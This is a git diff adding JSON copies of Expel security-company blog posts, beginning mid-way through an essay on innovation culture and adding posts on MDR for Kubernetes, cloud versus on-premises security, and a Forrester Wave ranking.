end up in a food fight with engineering (and possibly product management). You may recognize some of these statements: R&D to engineering: \u201cYou move too slow\u201d R&D to engineering: \u201cThis feature is way more important than Windows X backwards compatibility!\u201d Engineering to R&D: \u201cEverything you hand us works in 10% of situations.\u201d Engineering to R&D: \u201cThis isn\u2019t engineering quality code, rewrite it.\u201d How to create a healthy innovation backlog A healthy research (or innovation) backlog typically includes a bunch of tactical ideas that are being researched to solve day-to-day challenges the company faces. But we think the backlog also needs to include what we call \u201ccrazy town\u201d ideas (sometimes called \u201cmoonshots\u201d). These ideas probably don\u2019t correlate to the day-to-day pains and problems your company faces. They\u2019re forward-looking \u2026 and, as we like to say, anticipate where the puck is going ( #ALLCAPS ). Having a diverse innovation backlog is critical. But when a company has a traditional R&D structure (that is, when a group is labeled \u201cR&D\u201d), it\u2019s effectively telling the rest of the company, \u201cHey these are the people to come up with new ideas.\u201d Flip it around and what employees can hear (or think) is, \u201cWell, my ideas don\u2019t matter so I won\u2019t think critically or offer feedback.\u201d Or, perhaps, \u201cWell, since I\u2019m not on the R&D team, I\u2019m going to research over here in a corner and not tell anyone about it.\u201d Or, worst of all, \u201cI can\u2019t participate in R&D so I\u2019m going to take my ideas to another company.\u201d Innovation is a company-wide activity. Having a backlog of ideas siloed off in R&D isn\u2019t an effective way to tackle innovation. Read on to see how we\u2019ve tried to approach things differently. Three signs that your R&D team is stifling innovation It can be hard, at first, to recognize when R&D has put up unnecessary hurdles. Nobody picks up a bullhorn and announces them. They\u2019re more subtle and silent. Here are three signs that you\u2019ve got them. There\u2019s no single view of all research projects: No one person can identify project owners, deduplicate similar projects, track project status, etc. This lack of visibility can impact cost and engineering velocity. Great ideas stay hidden: New ideas that are great may never get brought up. If you\u2019re finding employees are contributing to or creating their own open source projects that\u2019s a possible sign your innovation is going elsewhere. A-ha! Engineering: Large projects stay hidden until a great big reveal, ambushing teams across the company who could have been helpful / involved. You\u2019re solving irrelevant problems: Over time, your R&D group will likely move further away from relevant problems. Then, they\u2019ll wonder why other teams aren\u2019t bringing up new issues for them to tackle. If your R&D group is landing new projects, but the projects aren\u2019t well received there\u2019s a good chance they\u2019re growing disconnected from the day-to-day challenges your company is facing. This happens all the time in security where challenges often change on a daily or weekly basis. If any of these warning signs sound familiar you probably need to rethink your approach to how you innovate. Building an effective innovation engine (aka what I\u2019ve done at Expel) I was one of the first employees at Expel, so the only thing I could do was innovate. But, as a new organization, it also gave me a unique opportunity to experiment with new cultural norms that favor innovation, reward failures and involve everyone. Here are four things we\u2019re doing. Zero Day indoctrination Expel\u2019s culture is unique. We\u2019re a transparent managed security provider and transparency is core to our culture. Every new employee listens to a presentation called the Expel Palimpsest. It explains the fundamental tenets of our culture. And it includes this slide. This slide summarizes Expel\u2019s overall approach to innovation \u2013 it involves everyone and it starts on day zero. The innovation slides are aimed at everyone \u2013 not just our security analysts or engineers. Now, a single slide doesn\u2019t create a culture. That comes from day-to-day reinforcement of the messages on the slide with actions. One way we reinforce that is through a weekly experiment meeting and our monthly all hands meeting. Weekly experimentation meeting There are three main goals of our weekly experimentation meeting: Review new ideas (with a focus on prioritization). If we\u2019re going to consider an idea for prioritization, this is where we define concrete next steps that include failure/success criteria for the first pass. It\u2019s a delicate balance when a new idea comes in that isn\u2019t worth actioning. We usually encourage them to think more about their idea while exposing them to alternatives to what they proposed. As you build trust, you\u2019ll find you\u2019re able to more directly say this is probably not worth actioning because of X Y Z. Update status of ongoing experiments. For experiments that are already underway we like to focus on what progress has been made, discussing ideas about how to improve them and identifying (and clearing) roadblocks that might slow it down. Review results from individuals or teams. When we review the results of an experiment there\u2019s a lot of discussion. Did it fail or succeed? If it failed, do we want to try something different or call the whole experiment a failure? If it succeeded, is it still a high priority experiment? A different person runs our weekly meeting every week. Changing up who leads it is important; it breaks up the monotony and allows individuals to focus discussion on what matters most from their perspective. Changing who runs the meeting also reinforces that innovation is democratized across the whole company. Case in point, last week one of our badass interns ran the meeting. Anyone at Expel can attend the experiments meeting and any individual or team can work on a prioritized experiment. We use Trello to track our ideas as experiments. The diagram below outlines the various states an experiment can live in as it moves from concept to completion. Phases of an experiment An important note: These phases are specific to experiments related to detection, hunting, and response. The phase may differ if we were doing different types of experiments (for example, evaluating new database performance). Scrub \u2013 This is where new ideas go. Every month at our company all hands we acknowledge everyone who submitted a new idea, regardless of what the outcome was. Untested ideas \u2013 After we scrub an idea, we move it to \u201cuntested\u201d unless we\u2019re able to resource it immediately. We try to keep this prioritized, but \u201ctry\u201d is the operative word there. Test in progress \u2013 At this phase, we\u2019ve decided to see how viable the idea is. We do our best to scope these tests so they have a quick turn around \u2013 a week or two on an initial idea is ideal (though there are exceptions). The goal here is to see if the concept holds up at some small scale. Note: at this point and going forward any experiment/idea can move from a given phase in the workflow to either \u201cblocked\u201d or \u201cfailed\u201d state. If we fail we\u2019ll have a mini post-mortem write up about what we tried, where we failed and anything we would do differently. That way if we want to pick up a failure a year from now we can recall what happened. Viable \u2013 If the test was successful, where success is reviewed and determined by everyone attending the weekly meeting, the experiment goes into the \u201cviable\u201d state. This state is the queue where engineering (or researchers with an engineering background) can go to pick up work. The queue is also another point where we prioritize. We can take resources off of other projects to move something into a release state if we think it\u2019s that important. Release: experimental \u2013 Once we\u2019ve taken the viable idea and resourced it to get it quickly into production, the idea/feature/experiment is marked as \u201cExperimental.\u201d This means the only people reviewing the output are those involved in the experiment and possibly one customer. Release: limited availability \u2013 At this phase, we\u2019ve reviewed the experimental results, run the experiment on varying data types/sizes and we\u2019re reasonably confident it\u2019s stable, meaning the variance is limited. Once an experiment gets to this phase we\u2019ve got our most senior analysts looking at it. Release: general availability \u2013 Finally, when an idea becomes generally available, it means we\u2019ve got strong documentation, monitoring, logging and support. We\u2019ve had two or three associate analysts review it, and they were able to consistently draw the same conclusion. Associate analysts are generally analysts who are working their first security job. Two critical partners: internal and external customers Our internal customers for the experiments are involved in the process from inception to delivery. Heck, it may have been their idea in the first place and they just didn\u2019t have the dev skills to execute it. By meeting with any and all stakeholders, everyone gets an opportunity at every phase to ask questions like, \u201dIs this still the most important thing we should resource?\u201d so we can continuously prioritize experiments that have (or could have) an impact. Too often, researchers go heads down for three months, come back up and the ground has shifted out from under them so that the problem they have solved no longer exists because of _______. We also involve our customers as early as possible \u2013 even at the experimental release stage. It\u2019s one of our core tenets. We\u2019ll talk to the customer before we run an experiment, so they know we\u2019re going to try something new. Then, after the experiment, we provide results even if it went poorly. While this approach works for us, you\u2019ll have to figure out how and when you want to engage customers. We\u2019ve found that by engaging customers early, they get the opportunity to offer feedback (which they like) and we learn things early in the process that ultimately save us time. Through these conversations, trends can emerge. You\u2019ll know you\u2019ve really hit the win button when customers are proactively engaging you with new ideas. Yay! Another failure. If fear of failure is part of your culture it will squash creativity. You\u2019ll always hit your target because you aren\u2019t aiming outside your comfort zone. This is very dangerous for the longevity of any company (unless you are flush with cash and can acquire companies who don\u2019t fear failure). If you\u2019re transparent about your experimental results, you naturally destigmatize the fear of failure. And when the whole company sees experimentations at all levels of the business it gets even more interesting. The greater danger for most of us lies not in setting our aim too high and falling short; but in setting our aim too low, and achieving our mark. \u2013 Michelangelo As a young company that\u2019s still growing, we want to fail fast, and failures have to be applauded. Again, we make sure that we\u2019re walking the walk \u2013 at the highest levels. A director saying \u201cgreat job failing guys that\u2019s what we want\u201d doesn\u2019t have the same impact as the CEO standing up in front of the company month after month and saying \u201cWe\u2019ve got to fail more.\u201d The importance of celebrating failure in a company is that it removes the pressure of always being right. This pressure can swallow up impactful ideas and prevent them from being shared. Reed Hastings CEO of Netflix summarized this sentiment well: \u201cOur hit ratio is way too high right now,\u201d Hastings said. \u201cSo, we\u2019ve canceled very few shows \u2026 I\u2019m always pushing the content team: We have to take more risk; you have to try more crazy things. Because we should have a higher cancel rate overall.\u201d \u2013 Reed Hastings The approach I\u2019ve outlined here may or may not work at your company. The point is, that you should always be evaluating how you\u2019re innovating (or R&Ding). At Expel, we\u2019re continually trying to figure out ways to involve more people in the innovation process. A new initiative we\u2019re starting internally is \u201ctwitch for innovation\u201d where we set up fixed times to hold Zoom conference screen shares. The person sharing their screen talks about how they\u2019ll work on an experiment, and actually does a bunch of the research with people watching. Anyone in the company can join the session, watch what they do, how they think and ask questions. This idea isn\u2019t new. In fact, well-known researchers like Cody Pierce , and Silvio Cesare have been live streaming various research sessions. Being able to watch a research professional is invaluable. There\u2019s always something to learn no matter how experienced you are. Eventually, we\u2019d love for customers to be able to watch as well. Conclusion I know changing culture is hard and one meeting a week likely won\u2019t change anything. Coming to Expel, I had the benefit of defining a new culture (vs. changing an existing one). That said, here are a few ideas that might help in your innovation journey. Consider over communicating research status. Go to weekly engineering planning or sprint meetings. Make sure they know what you\u2019re working on and make it clear to engineering that nothing will get dropped in their lap. Emphasize that bringing something to production will be a collaborative effort. Require people responsible for experiments meet with engineering to understand code coverage and code style guidelines. Delivering your results with unit tests that meet code coverage requirements and style guidelines is a great way to show you respect engineering. Have engineers pair up with researchers (and vice versa). It will help each team build a healthy respect for what each other brings to the table. A weekly meeting to discuss new public research or internal research is a good first step to improving visibility. As you build trust, you can move to a more formal collaborative process but starting out with a meeting to discuss ideas and results is a good first step." +} \ No newline at end of file diff --git a/why-mdr-for-kubernetes-is-great-news-for-your-org.json b/why-mdr-for-kubernetes-is-great-news-for-your-org.json new file mode 100644 index 0000000000000000000000000000000000000000..ddf5d983aed1004b32ea5e377e7cf21c43baafa7 --- /dev/null +++ b/why-mdr-for-kubernetes-is-great-news-for-your-org.json @@ -0,0 +1,6 @@ +{ + "title": "Why MDR for Kubernetes is great news for your org", + "url": "https://expel.com/blog/why-mdr-for-kubernetes-is-great-news-for-your-org/", + "date": "Feb 15, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Why MDR for Kubernetes is great news for your org Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 FEB 15, 2023 \u00b7 TAGS: Cloud security / MDR The potential for Kubernetes is huge, and the challenges facing early adopters are, too. We announced the first-to-market MDR for Kubernetes offering on Monday , and we\u2019d like to share some key considerations for your organization. We recently detailed the rapid growth of Kubernetes and container environments and walked you through what our customers see as their biggest challenges . Today let\u2019s talk about how managed detection and response (MDR) for Kubernetes (k8s) makes the future a brighter place for organizations that rely on in-house application development. For starters, MDR for Kubernetes helps orgs secure operations across every attack surface . It removes blind spots for the security team, arms the DevOps team to handle remediation, and lets developers do what they do best\u2014build applications that propel the business. MDR for Kubernetes provides insights across three core layers of Kubernetes applications: Configuration: More than half of organizations using Kubernetes found at least one misconfiguration in the past year , and failure to get ahead of the problem opens the door for attackers. MDR for Kubernetes identifies cluster misconfigurations and references the Center for Information Security (CIS) best practices benchmark to recommend enhancements, increasing your security team\u2019s resilience. Control plane: No matter how far along you are on your journey, MDR for Kubernetes translates complexity into clarity by: \u25cb Integrating with cloud k8s infrastructures, like Amazon Elastic Kubernetes Service (EKS) and Google Kubernetes Engine (GKE); \u25cb Analyzing audit logs; applying custom detection logic to alert on malicious or interesting activity; and \u25cb Providing clear remediation guidance. Run-time security: Bring-your-own-tech models maximize return on investment (ROI). MDR for Kubernetes can integrate with a broad portfolio of run-time container security vendors to provide the answers you need for the tech you already use. MDR for Kubernetes also aligns to the MITRE ATT&CK framework, helping your SecOps team quickly remediate and build resilience for the future. Expel-authored detections learn and adapt based on activity in your environment, keeping you ahead of threats. You\u2019ll develop your own insights and best practices to track k8s security posture over time, and you won\u2019t be flying without a net: a security operations center (SOC) is on hand with 24\u00d77 triage and support. Plus, MDR for Kubernetes generates deeper awareness across your cloud infrastructure and drives more remediation recommendations where it matters to your business the most. Secure the business MDR for Kubernetes helps orgs remove their security blind spots by cultivating insight across the entire cloud attack surface. Security teams get important detection and response capabilities without causing friction for developers, letting them focus on building apps that matter to the business. Specifically, orgs can monitor and secure k8s across control plane, configuration, and container runtime security layers. Continuous monitoring of event logs, security alerts, and configuration details demystifies the complexity of Kubernetes, providing actionable security findings and recommendations to improve security posture over time. Improve ROI Any new technology investment must pass the ROI test. The great news here is that MDR for Kubernetes boosts return by working with your existing infrastructure. This means no matter where you are on your security journey in Kubernetes, MDR for Kubernetes can provide detection and response capabilities without requiring additional investment. And importantly, as you mature, its capabilities grow with you. CISOs and their teams quickly discover that enhanced visibility into the Kubernetes environment improves security results. They gain complete coverage across cloud infrastructure\u2014and with our new offering, it\u2019s all in the Expel WorkbenchTM platform\u2014and eliminate silos between DevOps and security, accelerating the business. Enable the business Security is often viewed as an inhibitor to business performance\u2014a cost center and point of friction. According to Red Hat, 55% of organizations have had to delay application deployment due to security concerns . With MDR for Kubernetes, organizations can continue to ship software with the added confidence that continuous security monitoring provides. Security teams get important visibility and insight, DevOps teams spend less time chasing noisy security alarms, and developers are enabled to do what they do best\u2014build what the business needs. Doing this at scale requires deep visibility, effective detection and response capabilities, and an ability to anticipate and address risks in Kubernetes before they result in business impact. Stay tuned for more k8s insights and resources. In the meantime, have a look here (and see what one customer architect says about why his org is happy to be aboard\u2026)" +} \ No newline at end of file diff --git a/why-the-cloud-is-probably-more-secure-than-your-on-prem.json b/why-the-cloud-is-probably-more-secure-than-your-on-prem.json new file mode 100644 index 0000000000000000000000000000000000000000..9a7042bd2a0847872f59a08a0d7e45b726fe412f --- /dev/null +++ b/why-the-cloud-is-probably-more-secure-than-your-on-prem.json @@ -0,0 +1,6 @@ +{ + "title": "Why the cloud is probably more secure than your on-prem ...", + "url": "https://expel.com/blog/why-cloud-probably-more-secure-than-on-prem-environment/", + "date": "Dec 17, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Why the cloud is probably more secure than your on-prem environment Security operations \u00b7 8 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 DEC 17, 2019 \u00b7 TAGS: Cloud security / Planning / SOC Cloud this, cloud that\u2014the cloud has sure become the buzzword in IT, dev ops, and cybersecurity, hasn\u2019t it? According to Gartner, \u201cBy 2022, up to 60% of organizations will use an external service provider\u2019s cloud-managed service offering, which is double the percentage of organizations from 2018.\u201d 1 However, there are still plenty of cloud skeptics out there, wondering whether all of those who have gone before them are further on the path to demise\u2014from a security standpoint, that is. We believe the skeptics can rest easy. Cloud service providers (CSP) know that their profitability and reputation depend on their ability to maintain security for customer data. Therefore, security is a focus for all the CSPs, and they\u2019ve each made significant investments in physical security and hiring security experts. Is Data More Secure On-Premise? One reason that some of us struggle with putting data in the cloud is that we have a warm and fuzzy feeling about having our data physically close. We believe that if the data is in our own data centers\u2014at the end of the hallway\u2014then it\u2019s somehow more secure. The reality is that the physical location of the data has little to do with its security. What affects security most is access and control. If we\u2019re honest with ourselves, how many times have we walked past the data center to find the door propped open with a box fan? How many times have we seen an unescorted visitor roaming that same hallway looking for the restroom? We have a human tendency to become comfortable in our own surroundings, but when we become comfortable, we become complacent. This is why incident responders find abandoned vendor access points in on-premise data centers on the regular. On-Premise vs. Cloud Security Here are five reasons why your data might just be safer in the cloud. Reason #1: Physical Access Unlike most of the environments we\u2019ve all worked in, CSPs have incredible standards for physical access controls. If you don\u2019t believe me, check out some of the data center tours that are posted on YouTube . CSPs exercise security defense in layers, starting with having very restricted access to the places where customers\u2019 data is stored. Authorized employees must pass through security gates and fences, security guards, and surveillance cameras. The buildings are designed with mantraps and limited ingress and egress points and are also equipped with biometric scanners. Additionally, anytime an employee has to perform any kind of maintenance within the data center, the work is rigorously audited. Those employees even have to have proprietary hardware and chips in their badges or other devices in order to be authenticated and allowed inside the data center. If somehow a bad actor were to thwart all of these controls and enter the data center\u2014which is pretty unlikely\u2014your data is still protected by additional layers of security. CSPs protect your data with anonymity, encryption, and replication. In addition to using several layers of encryption for data at rest (either AES256 or AES128), CSPs also distribute each customer\u2019s data across multiple computers. 2 Here is a snippet from Google\u2019s website that explains in more detail how they protect your data within their data centers: \u201cRather than storing each user\u2019s data on a single machine or set of machines, we distribute all data\u2014including our own\u2014across many computers in different locations. We then chunk and replicate the data over multiple systems to avoid a single point of failure. We name these data chunks randomly, as an extra measure of security, making them unreadable to the human eye.\u201d 3 The TL;DR: Most businesses couldn\u2019t achieve this level of physical security on their own, given the sheer amount of resources you\u2019d need to do it, like real estate, personnel, and technology. Reason #2: Resiliency An important aspect of physical data security that\u2019s often neglected is resiliency. When I say resiliency, I mean that when you store data somewhere, you expect that when you need it again, you can go back and it\u2019ll still be there as you left it. CSPs know that business data is often mission-critical so they invest resources to offer their customers consistent reliability. Objects are stored redundantly on multiple devices across multiple facilities by CSPs, no interaction from the customer required. For example, Amazon Web Services (AWS) states that they design their redundancy for Amazon S3 to sustain the concurrent loss of data in two facilities. 4 What reliability does this represent? To put in perspective, in the last month, according to Cloud Harmony Amazon S3 had 100 percent availability across all 18 regions globally with zero minutes of recorded downtime. Google Cloud Storage reported a total of 3.88 minutes of downtime from two of their 26 regions and Microsoft Azure Cloud Storage reported a total of 48.13 minutes from only one of their 36 regions. Because none of the CSPs reported multiple concurrent data center outages, most users wouldn\u2019t have noticed there was an outage. Can your IT department guarantee that you will have nearly 100 percent availability and reliability? Most companies probably have some level of redundancy at maybe one other site and perhaps a set of tapes stored elsewhere that they could access if things really went sideways. But the reality is that backups and archives take time to put back into production, and you\u2019ll probably experience some data loss in the delta between when the backup was last written and when it is put back into production. The redundancy and data arrays offered by CSPs allow real-time, seamless continuity. Additionally, customers have the ability to automate additional redundancy across other regions and countries to accommodate for regional catastrophic events, such as hurricanes, earthquakes, or other natural disasters. Unless your company is already a global operation with offices around the world, your IT department likely can\u2019t achieve this level of redundancy. Reason #3: Significant Investment in Security Expertise In determining the security of data, we often evaluate two things: physical access and virtual access. I mentioned a few reasons why CSPs can provide better physical access controls, but there are some ways that CSPs can offer better virtual access controls, too. According to Microsoft, the company has a \u201cteam of more than 3,500 global cybersecurity experts that work together to help safeguard your business assets and data in Azure.\u201d 5 Their cybersecurity team alone is larger than the employee size of most businesses in the United States. It\u2019s a luxury for most companies to have two or three people on their staff who focus on cybersecurity. The reality is that most companies hire a bunch of developers and engineers for production, a small staff for IT and the help desk, perhaps an information security officer, and maybe someone on the IT team gets some extra security or incident response training (I know, I know\u2026 it\u2019s not just you who feels this way!). With all of the cybersecurity expertise at their disposal, CSPs can make sure that advanced security features are built into every product and service to keep data protected at every layer. These cybersecurity teams include security engineers, security architects, security analysts and incident responders, data scientists, penetration testers, vulnerability engineers, code reviewers, quality assurance, and compliance auditors and specialized feature development teams\u2014and their single focus is on providing and improving security. Reason #4: Development of Best-in-Class Access control Systems Because of the vast security expertise they have on staff, CSPs have the ability to develop best-in-class authentication and access control systems. By now you\u2019ve probably seen the Login with Google button on some of your favorite websites and thought, \u201cThat\u2019s odd\u2026 this isn\u2019t even a Google website.\u201d Or perhaps you\u2019ve seen \u201c Log in with Facebook \u201d or \u201c Log in with GitHub \u201d. Sure, the site you\u2019re on might not be owned by Google or the others, but many companies have come to realize that it\u2019s difficult to continually stay updated on the latest attacks against authentication systems. Storing passwords is difficult and potentially risky. Keeping up with the latest multi-factor services is a constant sprint, and striking a balance between easy password reset functionalities and not giving the wrong person access to protected data is difficult to get right. CSPs have the expertise and the resources to stay on top of all of these concerns and deliver best-in-class control systems. These control systems include the secure management of passwords and keypairs, multi-factor authentication services, mitigating controls assigned to password resets, protection from brute force and malicious login attempts, key vaults, conditional access policies (geolocation, trusted devices/clients, trusted countries/regions, IP ranges), role-based access control, automated DDoS defenses, firewalls/VPC controls, secure VPN protocols, audit logging, and alerting. All of these systems are closely integrated, tested, and audited by CSPs on a continual basis. It would take a large team of developers and security engineers to even begin to replicate these control systems on-premise, and that doesn\u2019t even take into account the additional maintenance and testing required to support and validate these systems. That said, just because CSPs do a great job protecting their own infrastructure doesn\u2019t mean that once you put your data in the cloud, you can wipe your hands clean of all things security. CSPs are responsible for protecting the global infrastructures that run all of the cloud services: the hardware, software, networking, and facilities that run all of the cloud platform services offered by the provider. As the customer, you\u2019re responsible for the security of your data and the resources you create in the cloud. That includes protecting the confidentiality, integrity, and availability of your data and maintaining any compliance requirements for your workloads, whether you use the controls provided by your provider or you bring your own. Reason #5: Vulnerability and Patch Management CSPs have entire teams of people solely devoted to detecting vulnerabilities and conducting patch management. These teams scan for software vulnerabilities using a combination of commercially available and purpose-built tools. They also conduct intensive automated and manual penetration testing, software security reviews, and external audits. These teams are dedicated to finding vulnerabilities before the attackers do. For the average company, the IT Manager is the vulnerability scanner and auditor, and they play that role in addition to looking after all their other duties and responsibilities. The IT Manager may get lucky and have some funding at the end of the year to put toward a third-party assessment or penetration test. It\u2019s then the responsibility of the IT Manager to make sure that all of the system owners are following up with the recommendations and patchwork suggestions made by those third parties. The reality is that this kind of work can be exhausting for small teams, especially when the IT team is already wearing many hats. That\u2019s why it often falls through the cracks. Think about how many organizations fell victim in May 2017 when WannaCry ransomware used the EternalBlue vulnerability to spread itself. Microsoft announced the vulnerability on March 14, 2017, in security bulletin MS17-010; however, two months later, millions of systems remained unpatched. 6 Security: Still A Shared Responsibility Notice that I talked about \u201cwhy the public cloud can be more secure\u2026\u201d and not \u201cwhy the cloud is more secure\u2026.\u201d Sure, CSPs have a great culture of security. They\u2019ve built many features and services to make it possible for you to experience data security, but you\u2019ve got to take the initiative to enable the security controls they\u2019re offering. If you don\u2019t take the time to learn about the security features and controls at your disposal and you don\u2019t turn them on, they won\u2019t do you any good. For example, multi-factor authentication and conditional access policies are great features but they aren\u2019t automatically configured or enforced\u2014you\u2019ve got to do a little bit of the legwork here. Most cloud providers offer security best practice documents or security checklists . These are a helpful starting point to learn about some of the security features and controls available to you. Remember, you aren\u2019t their first customer, meaning that the CSPs know their own services better than anyone and they know what other customers experienced when they haven\u2019t followed security best practices with their services. When you sign up with a CSP, they will guide you on what to do. Take the time to learn about the security features and controls that are available. And use them. Whether you stick with on-premise solutions or migrate to the cloud, Expel offers a managed security and detection response system with multiple integrations to endpoint, SIEM, and cloud software systems. Contact us today to see how we can help you make your system more secure. 1: Gartner Press Release \u201cGartner Forecasts Worldwide Public Cloud Revenue to Grow 17% in 2020,\u201d 13 November 2019. https://www.gartner.com/en/newsroom/press-releases/2019-11-13-gartner-forecasts-worldwide-public-cloud-revenue-to-grow-17-percent-in-2020 2: Encryption at rest in Google Cloud https://cloud.google.com/security/encryption/default-encryption 3: Data and Security https://www.google.com/about/datacenters/data-security/ 4: Data protection in Amazon S3 https://docs.aws.amazon.com/AmazonS3/latest/userguide/DataDurability.html 5: Strengthen your security posture with Azure https://azure.microsoft.com/en-us/overview/security/ 6: Microsoft Security Bulletin MS17-010 \u2013 Critical https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" +} \ No newline at end of file diff --git a/wow-they-really-like-us.json b/wow-they-really-like-us.json new file mode 100644 index 0000000000000000000000000000000000000000..0dd89570c5349f40476309c46e8e4a4f9e0e9a49 --- /dev/null +++ b/wow-they-really-like-us.json @@ -0,0 +1,6 @@ +{ + "title": "Wow, they really like us", + "url": "https://expel.com/blog/they-really-like-us/", + "date": "Mar 24, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Wow, they really like us Expel insider \u00b7 1 MIN READ \u00b7 DAVE MERKEL \u00b7 MAR 24, 2021 \u00b7 TAGS: Company news / MDR You have to be at least a little confident to take a flying leap and start a company \u2026 especially if you\u2019re thinking of approaching investors to support you. If you don\u2019t believe in yourself, how can you convince others to put their money into your idea? Unless you\u2019re cynical and manipulative, but \u2026 I digress. It started with a tweet Five years ago, we set out to be anything but that security vendor. No red in the logo, no fear in the marketing and a ban on stupid phrases like \u201cmarket leading\u201d when you have, like, five customers. We set out to build something our customers could actually love, that creates space so they can spend their time on their priorities and passions. Managed security as an industry hadn\u2019t delivered on those promises. We hoped to change that. Did we think we could do it? I don\u2019t know how confident I was in myself and my co-founders alone. We were three guys with 10 Microsoft PowerPoint slides flying from meeting to meeting with investors. But the team we put together? We were confident they could do it. And they did. How do we know that? Our customers tell us all the time. Just out: Q1 2021 Forrester Wave\u2122 Report It\u2019s pretty cool when someone who spends their time understanding our market, day in and day out, agrees that our crew and what they do for our customers is, in fact, awesome. Forrester just published their report entitled The Forrester Wave\u2122: Managed Detection and Response, Q1 2021 . It is, to my knowledge, the only analyst report on the managed detection and response (MDR) market that provides comparative rankings at this time. See that dot in the top right? Yeah. That\u2019s my crew. They did that. I\u2019m feeling something right now. I believe the word is \u201cchuffed.\u201d Today\u2019s a pretty good day. Want to check it out? You can download your copy of the report here . (Don\u2019t worry \u2013 we\u2019re picking up the tab. You can grab a free copy using our link.)" +} \ No newline at end of file